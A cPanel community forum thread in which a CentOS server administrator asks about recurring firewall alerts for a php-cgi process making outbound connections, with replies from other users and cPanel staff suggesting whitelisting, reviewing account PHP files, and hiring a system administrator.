Suspicious process running under user
Hello,
I have a server with centos 7.4
My firewall gives me these messages below.
I run maldet, erase all the threats, and a few days later, it comes back.
I dont know ho to prevent these threats.
thank you
--------------------------------------------------------
Suspicious process running under user...(always diffetent users)
Executable:
/opt/cpanel/ea-php56/root/usr/bin/php-cgi
Command Line (often faked in exploits):
/opt/cpanel/ea-php56/root/usr/bin/php-cgi
Network connections by the process (if any):
tcp: 192.99.39.58:60352 -> 69.30.221.50:80
Files open by the process (if any):
/var/cpanel/locale/en.cdb
-
/opt/cpanel/ea-php56/root/usr/bin/php-cgi
The path is valid. It's not Suspicious process so you have to add this path in firewall ignore list. Please check the same post Suspicious process running under0 -
Hello, Keep in mind the notification you are referencing comes from CSF/LFD as opposed to cPanel. If the traffic is malicious, some of the solutions referenced on the following threads should help: Prevent wordpress Brute Force Attacks Outbound wp-login.php brute force attack from my cpanel server Thank you. 0 -
Even if the path is valid, I dont think its legit. I dont understand why accounts would start to launch a bunch of requests. 0 -
Even if the path is valid, I dont think its legit. I dont understand why accounts would start to launch a bunch of requests.
Hello, Were you able to review my previous response regarding this issue (it's after the initial response you received from another user)? Thank you.0 -
I did but weirdly the users wich are making these connections are not using wordpress. I'm really lost and dont know what to do 0 -
Hello, You will sometimes see this type of activity when a PHP script is making a connection to an update server for automatic updates to the script. You can review the PHP files uploaded to the account referenced in the notification to see if it's using any specific PHP scripts that make outgoing connections to the referenced IP address. You may also want to reach out to the individual account holder to request information about the activity. If you require additional help, you can find a list of system administration services on the following URL: System Administration Services | cPanel Forums Thank you. 0 -
Actually, these scripts are launched from users that don't even have any activity besides emails. No website or anything else. And the script start multiple processes with the same user, all targeting the same IP. And if I suspend the user, a few hours later, it starts with another user. I also had some who were sending spams, but I disabled mail in PHP so I don't have this problem anymore. I am convinced that its malicious, but I just dont know how to get rid of it. 0 -
Hello, I recommend seeking out assistance from a qualified system administrator if you'd like further investigation into what could be causing the issue on the affected server. We provide a list of companies offering system administration services in the URL from my last response. Thank you. 0 -
Can you recommend me one of them please. 0 -
Hello, It's against our policy to recommend a specific vendor, but you are welcome to search their company names on a search engine or another forum such as WebHostingTalk to see if you can find existing reviews. Thank you. 0
Please sign in to leave a comment.
Comments
10 comments